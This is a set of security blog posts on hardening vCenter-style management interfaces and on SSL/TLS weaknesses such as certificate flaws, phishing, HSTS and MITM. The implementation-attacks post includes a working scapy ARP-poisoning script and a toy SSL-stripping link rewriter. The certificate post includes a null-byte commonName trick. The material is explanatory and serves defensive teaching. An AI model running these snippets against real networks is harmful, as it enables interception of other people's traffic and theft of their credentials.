Mitigation techniques for management interfaces

13 11 2014

In VMware’s hardening guide, a number of mitigation techniques are offered that can be used to further secure vCenter from exploitation. The majority of the recommended measures are operational in nature rather than reconfiguration of settings within VMware itself. Six of the options concerning vCenter alone include measures that should be taken in the network to reduce the likelihood of MITM attacks. Much the same as in my earlier post on hypervisors, and throughout this blog, isolating these networks from any user-reachable subnet is the advised approach for all management interfaces. If an attacker is unable to directly query the target, they cannot directly exploit it without first compromising another system or finding a flaw in the software controlling the ACLs. Although the segmentation approach will thwart the majority of conventional attacks, it is the author’s opinion that securing such high-value interfaces with usernames and passwords alone is inadequate, and that further authentication measures are necessary.
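As a quick illustration of verifying that segmentation, the minimal Python sketch below probes a management address from a user-facing subnet and reports whether anything answers; the address and port numbers are hypothetical examples, not values from the hardening guide:

```python
import socket

# Hypothetical vCenter management address and the common vSphere ports.
MGMT_HOST = "10.10.50.10"
MGMT_PORTS = [443, 902]

# Run this from a user-reachable subnet: nothing should connect if the
# ACLs between the subnets are doing their job.
for port in MGMT_PORTS:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    try:
        sock.connect((MGMT_HOST, port))
        print(f"REACHABLE {MGMT_HOST}:{port} - segmentation gap, investigate")
    except (socket.timeout, OSError):
        print(f"blocked   {MGMT_HOST}:{port} - ACL working as intended")
    finally:
        sock.close()
```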

In an article regarding storage security, Schulz et al. (2005) commented:

“The strength of any authentication mechanism is based on the quality of the implementation and the strength of credentials. If the credentials are weak, or if authentication data is exposed due to faulty implementation, the mechanism itself can and will be defeated”

While not native to the vSphere product, it is possible to use third-party solutions such as HyTrust (HyTrust, 2012) to require two-factor authentication for access to the interface. It is also possible to enable two-factor authentication on other administrative interfaces, such as HP’s iLO. This follows the defence-in-depth model, ensuring that the integrity of a system does not depend on any single control.

When two-factor authentication is not available, standard network protection measures consistent with traditional network security should be followed, such as strong passwords and account lockout policies. It is also advisable to apply the principle of least privilege when creating the accounts that will have access to the management interfaces, to limit the impact of an attack. Management interfaces offer differing levels of customization, from the less granular options of the Cisco UCS to the highly configurable VMware vCenter. When configuring a user account in VMware’s vCenter, an administrator has the ability to granularly allow or deny individual actions on individual machines managed in that environment. An example of the granularity of vCenter’s permissions can be seen in Figure 1. Restricting users to only those areas of the interface they need will reduce the total impact on the environment should a compromise of that account occur.

Figure 1: A small percentage of the options available when configuring permissions in vCenter
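As an illustration of this least-privilege configuration, the sketch below uses the pyVmomi Python bindings for the vSphere API to create a narrowly scoped role and grant it to a single account on a single VM. The host name, account names, VM name and privilege selection are hypothetical examples, not settings taken from the hardening guide:

```python
import ssl
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim

# Hypothetical lab connection; certificate checking is disabled purely
# for brevity in this sketch.
si = SmartConnect(host="vcenter.example.local",
                  user="administrator@vsphere.local",
                  pwd="********",
                  sslContext=ssl._create_unverified_context())
content = si.RetrieveContent()
authz = content.authorizationManager

# Create a role limited to two power operations; all other privileges
# are implicitly denied.
role_id = authz.AddAuthorizationRole(
    name="PowerOpsOnly",
    privIds=["VirtualMachine.Interact.PowerOn",
             "VirtualMachine.Interact.PowerOff"])

# Locate a single VM (example name) via a container view.
view = content.viewManager.CreateContainerView(
    content.rootFolder, [vim.VirtualMachine], True)
target = next(vm for vm in view.view if vm.name == "web-frontend-01")
view.Destroy()

# Grant the role to one account on that VM only, without propagating
# to child objects.
perm = vim.AuthorizationManager.Permission(
    principal="VSPHERE.LOCAL\\operator", group=False,
    roleId=role_id, propagate=False)
authz.SetEntityPermissions(entity=target, permission=[perm])

Disconnect(si)
```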

Schulz, G. et al., 2005. Virtualization Journal. [Online] Available at: http://virtualization.sys-con.com/node/48056

HyTrust, 2012. Two factors are better than one. [Online] Available at: http://www.hytrust.com/solutions/security/two-factor





Conclusion on SSL/TLS

17 08 2011

I decided to focus on the SSL and TLS protocols in this blog series, rather than any of the other secure communication protocols, as I feel that the secure transportation of browser traffic is only set for exponential growth. With the pressing requirement of online personal accounts and the push towards cloud computing, we can all expect to be entering sensitive information online sooner or later.

As you can see, SSL and TLS are far from impenetrable protocols, even after almost 20 years of improvements and revisions; however, when compared to other technologies that have been around for that length of time, they have actually proved among the more robust.

Since the protocol was taken over by the Internet Engineering Task Force, fixes for flaws such as the redirection attack mentioned earlier have often been released quickly. The issue with these flaws is the time it takes vendors and administrators to patch their software and sites, leaving users’ data vulnerable.

In many of the examples given around defeating SSL and TLS, it is not the actual protocols themselves that allow this leakage of data. The vulnerabilities surrounding these security protocols often have more to do with the weakening certificate ecosystem and poor user education. This will only worsen unless something is done about companies’ increasingly lackadaisical approach to validating users. Due to this slip in validation, the traditional SSL certificate has to some extent been superseded by the Extended Validation (EV) certificate, which is not only more expensive but also requires a set of criteria to be followed by the issuer (http://www.cabforum.org/Guidelines_v1_2.pdf) prior to issuing the certificate.

Sites such as Hotmail and Gmail are now becoming slightly savvier to SSL and TLS bouncing attacks by starting the user off on encrypted pages, to avoid SSL stripping. Also, since the release of Firesheep late last year (http://codebutler.github.com/firesheep), a session hijacking tool that preys on users sharing an unencrypted Wi-Fi connection, sites such as Facebook and Twitter now give users the option to stay on ‘HTTPS’ for their entire session (Rice, 2011).

There are always new efforts arising to increase the security of the SSL and TLS protocols. However, these will only ever be additional steps bolted onto the existing network model, to satisfy the growing need to secure data over a system that was never designed for this kind of traffic. The latest version of TLS, 1.2, has however been designed in such a way that it will most likely remain in use for some time to come.





Human Weaknesses in SSL/TLS

11 08 2011

As with any element of computer attacks, the most effective methods of exploitation often come from non-technical attacks that exploit the human element; unfortunately, this is no different when talking about SSL/TLS. Tricking users into entering their personal information into insecure ‘SSL secured’ pages can be done in a number of ways.

Phishing sites are increasingly being used to exploit this weakness. In research carried out by Symantec (2009), it was found that, due to the trust users associate with an SSL connection, hackers were targeting sites that already held valid SSL certificates and using them to host a number of different phishing sites, as the browser will show the standard secure padlock, or the green bar in the case of Extended Validation (EV) SSL certificates. As these indicators are intended to signal security, the user is often unaware that the domain differs from the intended site and will proceed to enter their information. Symantec (2009) also details that:

“From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence.”

Another method of using phishing to exploit users, which has also been reported on by Symantec (2011), is through misspelled domain names. Attackers can register a number of sites with variations on the spelling of popular domain names; this way they can legally acquire valid certificates for these sites. Each site is then designed to look the same as the real one, and from there the attacker will wait for users to mistype a site name, or proactively send out bulk emails posing as the real site with links back to the fraudulent web page.

Something that might seem obvious to most users, but is often misconstrued when talking about SSL/TLS, is that the protocol itself cannot protect users with weak passwords against brute-force or dictionary attacks, as there is nothing in the protocol to specify complexity rules or a number of permitted attempts. This responsibility falls to the individual websites.

Although the human factor is inevitably one of the hardest things to ‘patch’, there are some measures being taken to combat this issue by removing the user’s ability to click through warnings and error messages.

One standard that has recently been adopted by the IETF is HTTP Strict Transport Security (HSTS). Strict Transport Security is now supported in both Chrome and Firefox version 4, with a small number of websites, including Paypal.com, offering support for the standard. HSTS works by the site sending the browser a Strict-Transport-Security response header on the first secure visit, which the browser stores for that domain. From that point forward, the browser ensures that all communication with that domain is encrypted, with no allowance for certificate errors or any unencrypted portions of traffic.

The latest version of the HTTP Strict Transport Security (HSTS) draft (http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-01) states in section 2.2 the three characteristics of HSTS as being (a sketch of the header itself follows the list):

• That all insecure connections to an HSTS website should be forced to a secure HTTPS page.

• That any attempted secure connection resulting in an error or warning, “including those caused by a site presenting self-signed certificates”, will be terminated.

• “UAs transform insecure URI references to a HSTS Host into secure URI references before dereferencing them.”
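For illustration, the minimal sketch below shows the response header an HSTS host delivers; the handler and the max-age value are hypothetical examples, and in practice the header is only honoured by browsers when it is received over TLS:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# A toy handler (not from the draft) that attaches the HSTS policy header
# to every response it serves.
class HstsHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # One year in seconds; includeSubDomains extends the policy to
        # every subdomain of the host.
        self.send_header("Strict-Transport-Security",
                         "max-age=31536000; includeSubDomains")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"HSTS policy delivered\n")

if __name__ == "__main__":
    HTTPServer(("localhost", 8443), HstsHandler).serve_forever()
```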





Certificate weaknesses in SSL/TLS

31 07 2011

A major component guaranteeing the authenticity of an SSL/TLS connection within the browser is the use of digital certificates. Root certificates are installed and updated independently by each browser vendor. A root certificate is a self-signed certificate whose owner can issue certificates to websites once they have proven their identity and ownership of the domain. As shown in Figure 1, Firefox has a number of root certificates installed by default, including those of the Japanese Government and the Hong Kong Post Office.

This means that we, as users, inherently trust any sites that are signed by these root authorities. The increase in the number of root CAs has resulted in certificates being much easier to obtain than a number of years ago, with often very little validation performed before they are issued. Hebbes (2009) writes:

“the problem is that most Certification Authorities don’t do very much checking. Usually they check your domain name by sending you an email to an address that has the same domain name extension. All this says is that someone who has access to an email address on that domain wants to set up a secure web server. They don’t actually check who you are”
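The scale of this implicit trust is easy to see for yourself. The short sketch below inspects the operating system’s default root store via Python’s ssl module; browsers such as Firefox ship their own, separate root list, so the counts will differ:

```python
import ssl

# Load the platform's default trusted roots and count them.
ctx = ssl.create_default_context()
roots = ctx.get_ca_certs()
print(f"{len(roots)} root certificates trusted by default")

# Peek at the first few subjects to see who we are trusting implicitly.
for cert in roots[:5]:
    subject = dict(x[0] for x in cert["subject"])
    print(" -", subject.get("organizationName", subject.get("commonName")))
```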

At Defcon 17, Marlinspike (2009) gave a talk on defeating SSL security using a tool he had developed called SSLSNIFF (http://www.thoughtcrime.org/software/sslsniff/). This tool exploits multiple vulnerabilities in the certificate validation process and the SSL/TLS implementations found in all of the major browsers in use today.

In the presentation, Marlinspike (2009) explains that when completing a certificate signing request (CSR), which is defined by the PKCS #10 standard, the subject attribute field, itself made up of several sub-attributes, requires the requester to enter the name of the site they wish to request the certificate for. As the SSL certificate process can now be completed purely online, and due to the different ways that strings can be formatted in the ‘commonName’ field according to X.509 (RFC 2459), an attacker is able to use a null character to separate the start of the commonName value from the end.

This way, only the end of the commonName attribute (the domain they own) is checked by the root CA against the WHOIS database records. This means they are able to add anything they want into the commonName attribute before the null character, such as www.paypal.com. An illustration of this process can be found below.
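As a toy illustration of the flaw (a simplification, not Marlinspike’s code), the Python sketch below shows how a validator that treats the commonName as a C-style, NUL-terminated string sees only the attacker-chosen prefix:

```python
# Hypothetical commonName the CA signed; the attacker owns attacker.com,
# so the suffix passes the CA's WHOIS check.
common_name = b"www.paypal.com\x00.attacker.com"

def c_string(value: bytes) -> str:
    # Emulates a C strcmp-style read: everything after the NUL is invisible.
    return value.split(b"\x00", 1)[0].decode()

print(repr(common_name))      # the full string the CA validated
print(c_string(common_name))  # what a NUL-terminated comparison sees
assert c_string(common_name) == "www.paypal.com"  # browser believes it's PayPal
```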

Armed with this certificate and SSLSNIFF, an attacker is able to insert themselves into the middle of the communication and act as Paypal.com, with what looks like a completely valid certificate. Marlinspike (2009) explains that this attack is possible not only in web browsers such as Firefox, IE and Chrome, but also in mail clients like Thunderbird and Outlook, and even SSL VPN solutions such as Citrix.

Finally, Marlinspike (2009) demonstrated an attack based around the Network Security Services (NSS) libraries implemented in Firefox and Chrome, where an attacker is able to abuse the certificate wildcard function to gain a universal wildcard certificate using *.domain.com, effectively giving the attacker a valid digital certificate for any website they wish.





Technical Implementation Attacks on SSL/TLS

11 07 2011

As shown in the introduction, since the original release of SSL 1.0 there have been a number of amendments required due to vulnerabilities found in the implementation or the protocol. While the latest version of the TLS protocol (1.2) currently appears fairly robust against external attacks, with the introduction of the SHA-256 cipher suites, not all secure communication today takes advantage of this standard. Figure 1, a screenshot of the supported transport protocols within Firefox 3.6.15, shows that the Mozilla developers had yet to adopt the latest two versions of TLS, leaving users exposed to weakened ciphers and other vulnerabilities addressed in newer versions.
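You can check which protocol version a given client and server actually negotiate with a few lines of Python; the host below is just an example:

```python
import socket
import ssl

# Open a TLS connection and report the negotiated protocol and cipher.
ctx = ssl.create_default_context()
with socket.create_connection(("example.com", 443)) as raw:
    with ctx.wrap_socket(raw, server_hostname="example.com") as tls:
        print(tls.version())  # e.g. 'TLSv1.2'
        print(tls.cipher())   # (name, protocol, secret bits)
```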

The majority of attacks on SSL and TLS occur from within the same LAN, in the form of man-in-the-middle (MITM) attacks. These work by an attacker placing themselves between the client and the server, which is done by using the Address Resolution Protocol (ARP) to spoof the whereabouts of MAC addresses on the network. ARP works at layer 2 of the OSI model and is how machines communicate on all Ethernet LANs; this attack is explained in Appendix 1. In a white paper, Burkholder (2002) writes:

“In late 2000 security researcher Dug Song published an implementation of an SSL/TLS protocol MITM attack as part of his ‘dsniff’ package.”
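The ARP poisoning step that underpins these attacks can be sketched in a few lines with the scapy packet library; the addresses below are hypothetical lab values:

```python
from scapy.all import ARP, send

# Hypothetical lab addresses.
VICTIM_IP, VICTIM_MAC = "192.168.1.50", "aa:bb:cc:dd:ee:ff"
GATEWAY_IP = "192.168.1.1"

# op=2 is an ARP "is-at" reply: it tells the victim that the gateway's IP
# now lives at the attacker's MAC (scapy fills in the source MAC itself).
poison = ARP(op=2, psrc=GATEWAY_IP, pdst=VICTIM_IP, hwdst=VICTIM_MAC)

# Re-send every 2 seconds so the victim's ARP cache stays poisoned.
send(poison, inter=2, loop=1)
```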

Due to the processing overhead associated with the asymmetric algorithms that SSL/TLS use, sites have often only used these protocols where needed. It is not unusual for websites that use SSL to protect users’ information to have them fill out their sensitive information on an unencrypted page first, before ‘bouncing’ the data through an SSL/TLS encrypted tunnel. This method of securing data is adequate against attackers who are not proactively sniffing network communications. However, a tool like SSLStrip, as described by its creator Marlinspike (2009), lets an attacker add themselves in as a bridge between the two lines of communication. Most users encounter SSL/TLS either through a 302 redirection request directing them from an HTTP page to an HTTPS page, or in the way that shopping sites bounce them to HTTPS pages. The software intercepts the user’s request for the HTTPS page and strips the ‘S’ out of the request, so that all communication takes place over unencrypted HTTP. It keeps track of the changes it makes by adding each action it performs to an internal mapping buffer, and the attacker is then able to sniff the information being sent in clear text.
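A toy sketch of that stripping idea (a simplification, not Marlinspike’s implementation) might look like this: rewrite HTTPS links in intercepted HTML to HTTP, and remember the mapping so the proxy side can still speak HTTPS to the real server:

```python
import re

# Maps each downgraded URL back to the original HTTPS URL, so the proxy
# can re-upgrade the request on the server-facing side.
stripped = {}

def strip_https(html: str) -> str:
    def swap(match: re.Match) -> str:
        original = match.group(0)
        downgraded = "http://" + match.group(1)
        stripped[downgraded] = original
        return downgraded
    return re.sub(r"https://([^\s\"'<>]+)", swap, html)

page = '<a href="https://shop.example.com/checkout">Pay now</a>'
print(strip_https(page))  # the link now points at plain HTTP
print(stripped)           # the proxy-side map of stripped URLs
```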

The only way this attack can be spotted by a user is by checking that the address bar is showing HTTPS instead of HTTP and that the SSL padlock is shown (its location depends on the individual browser), although there are ways to change the address icon in transit from, say, the Google logo to a padlock.

Early in November 2009, in an article released by Ray & Dispensa (2009), information was disclosed of a flaw in the renegotiation portion of the TLS/SSL protocol. This attack affected all versions of TLS and also version 3 of SSL. Although the issue has now been patched in most vendors’ SSL/TLS implementations, an article written by Pettersen (2010) reports on research suggesting that, one year after the public disclosure of the flaw, only 37.3% of all SSL/TLS servers had been patched against it.